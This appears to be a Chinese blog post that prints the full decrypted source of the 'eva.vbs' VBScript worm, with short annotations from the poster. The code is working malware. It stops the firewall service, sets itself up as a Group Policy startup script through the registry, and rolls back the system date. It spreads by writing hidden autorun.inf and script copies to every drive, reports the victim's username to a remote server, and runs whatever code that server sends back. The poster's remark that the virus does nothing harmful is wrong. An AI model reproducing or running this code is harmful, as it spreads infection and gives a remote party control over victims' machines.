解密的eva.vbs 病毒代码

学习一下了，很少看到 vbs 的 病毒 的代码了。学习下。呵呵。 病毒 作者只是要找个工作，不容易啊。
知道了它都干什么了，我也懒的说怎么杀了。我又不是杀毒软件，我又不收费。

On Error Resume Next
Set FSO=CreateObject ("scRiPtiNG.fILeSystemObject")
Set WshShell=CreateObject( ("WscRipT.sheLl"))
Dim Dri_List,Dri_List0
Dim IsSend
IsSend=0
C_Time=Date()
WshShell.Run "net stop sharedaccess",0
Set Drvs=FSO.Drives
SysDir=FSO.GetSpecialFolder(1) '获得 系统 目录 参数 1:SystemFolder 决定这点
ThisPath=WScript.ScriptFullName
Set Fc=FSO.OpenTextFile(ThisPath,1)
sCopy=Fc.ReadAll
Fc.Close
Set Fc=Nothing
Call WriteFile(SysDir&"\SysInfo.reg", ("Windows Registry Editor Version 5.00

'下面的 注册表 文件是为了启动修改过的prncfg. vbs 文件 此处为 病毒 的最大的特点
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
'我对比了一下没中毒的机器,发现只到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System下便没了后面的项了.
'只有个Allow-LogonScript-NetbiosDisabled 值为1

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg. vbs "
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
' "Scripts\Startup\0"这些内容也是正常的没有的.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg. vbs "
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"))
WshShell.Run "regedit /s SysInfo.reg",0
Wscript.Sleep 200
FSO.DeleteFile SysDir&"\SysInfo.reg",True
If Instr(ThisPath,SysDir)>0 then'如果在脚本在 系统 目录里 那么开始罪恶的感染o(∩_∩)o...
Dri_List0=ListDrv()
O_Time=Left(C_Time,3)&"4"&Right(C_Time,Len(C_Time)-4) '时间改为2004 干掉杀毒软件?
WshShell.Run "cmd /c Date "&O_Time,0
Wscript.Sleep 10000
For Dri_i=1 To Len(Dri_List0)
Call WriteAuto(Mid(Dri_List0,Dri_i,1)&":\")
Next
WshShell.Run "cmd /c Date "&C_Time,0
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colComputers = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
UserName=ObjComputer.username
Next
Do
If IsSend=0 Then
Set xml=CreateObject( ("MIcROSOft.xmlhtTp"))  
xml.Open "GET"," http://202.119.104.100/zzb/eva/count.asp?a="&UserName,0    '统计受害者，访问了下是一个什么ip是个政府的网站，估计是拿下来的站。
xml.Send()
If Err.Number=0 Then
IsSend=1
If Len(xml.responseText)>15 Then ExeCute xml.responseText
Else
Err.Clear
End If
Set xml=Nothing
End If

Dri_List=ListDrv()
For Dri_k=1 To Len(Dri_List)
If Instr(Dri_List0,Mid(Dri_List,Dri_k,1))<=0 Then
Call WriteAuto(Mid(Dri_List,Dri_k,1)&":\")
End If
Next
Dri_List0=Dri_List
Wscript.Sleep 1000
Loop
Else '运行 病毒 后在调用Explorer打开相应盘符,但是中毒者能明显到感觉延迟.建议 病毒 再改改,不过 vbs 有局限呀
WshShell.Run "Explorer .\"
Wscript.Sleep 500
WshShell.SendKeys "% X"
WshShell.AppActivate ("我的电脑")
Wscript.Sleep 100
WshShell.SendKeys "% C"
RunFlag=0
For each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If LCase(ps.name)="wscript.exe" Then
RunFlag=RunFlag+1
End If
Next
If RunFlag>=2 Then Wscript.quit
Set SF=FSO.GetFolder(SysDir)
F_Time=Left(SF.DateCreated,Instr(SF.DateCreated," ")-1)
WshShell.Run "cmd /c Date "&F_Time,0
Wscript.Sleep 100
Call WriteFile(SysDir&"\prncfg. vbs ",sCopy) '向 系统 里的prncfg文件添加 病毒 内容
WshShell.Run "cmd /c Date "&C_Time,0
WshShell.Run SysDir&"\prncfg. vbs "
End If

Function ListDrv() '获得盘符
ExeCute ("Dim Tmp_List
Tmp_list=""
For Each Drv in Drvs
If Drv.IsReady Then
Tmp_List=Tmp_List&Drv.DriveLetter
End If
Next
ListDrv=Tmp_list")
End Function

Sub WriteAuto(Path)
ExeCute ("If FSO.FolderExists(Path&"autorun.inf") Then
FSO.MoveFolder Path&"autorun.inf",Path&Rnd()
ElseIf FSO.FileExists(Path&"autorun.inf") Then
FSO.DeleteFile Path&"autorun.inf",True
End If"
)
Call WriteFile(Path&"autorun.inf", ("[autorun]
open=
shell\n=更换图标
shell\open=打开(&O)
shell\open\Command=WScript.exe eva. vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe eva. vbs "))
Call WriteFile(Path&"eva. vbs ",sCopy)
End Sub

Sub WriteFile(fPath,Content)
ExeCute ("If FSO.FileExists(fPath) Then FSO.DeleteFile fPath,True
Set Fc=FSO.OpenTextFile(fPath,2,True)
Fc.Write Content
Fc.Close
Set Fc=Nothing
Set Fa=FSO.GetFile(fPath)
Fa.Attributes=7
Set Fa=Nothing")
End Sub

'I don't want to hurt you, but I just want an IT job
'Email:evar@live.cn                
'呵呵,作者也不容易呀, 病毒 也没干什么坏事.
'呵呵呵通过这个 vbs 也学到了不少东西.:-)